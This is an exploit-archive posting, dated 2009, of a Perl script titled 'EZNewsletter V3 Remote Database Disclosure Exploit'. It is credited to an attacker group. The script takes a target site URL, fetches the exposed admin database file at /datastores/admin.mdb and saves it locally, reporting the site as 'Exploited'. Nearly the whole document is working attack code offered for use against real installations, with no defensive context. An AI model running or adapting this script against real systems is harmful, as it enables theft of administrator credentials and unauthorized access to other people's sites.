eznewsletter3-disclose.txt
Posted on 08 July 2009
#!/usr/bin/perl ############################################################# # Application Name : EZNewsletter V3 # Vulnerable Type : Arbitrary Database Disclosure Vulnerability # Infection : Admins Database Download # Script Downlaod : http://www.htmljunction.com/eznewsletterv3.zip # author : Septemb0x ############################################################# # Greetz BHDR, BARCOD3 use lwp::UserAgent; system('cls'); system('title EZNewsletter V3 Remote Database Disclosure Exploit'); system('color 2'); if (!defined($ARGV[0])) {print "[!] Usage : perl exploit.pl http://sitename/path ";exit();} if ($ARGV[0] =~ /http:/// ) { $site = $ARGV[0]."/"; } else { $site = "http://".$ARGV[0]."/"; } print " [-] EZNewsletter V3 Remote Database Disclosure Exploit "; print "[+] Author : Septemb0x "; print "[!] Exploiting $site .... "; my $site = $ARGV[0] ; my $target = $site."/datastores/admin.mdb" ; my $useragent = LWP::UserAgent->new(); my $request = $useragent->get($target,":content_file" => "c:/db.mdb"); if ($request->is_success) {print "[+] $site Exploited ! Database saved to c:/db.mdb | Cyber-Warrior Bug Researcher Group | Septemb0x...";exit();} else {print "[!] Exploiting $site Failed ! [!] ".$request->status_line." ";exit();} _________________________________________________________________ http://www.microsoft.com/turkiye/windows/windowslive/
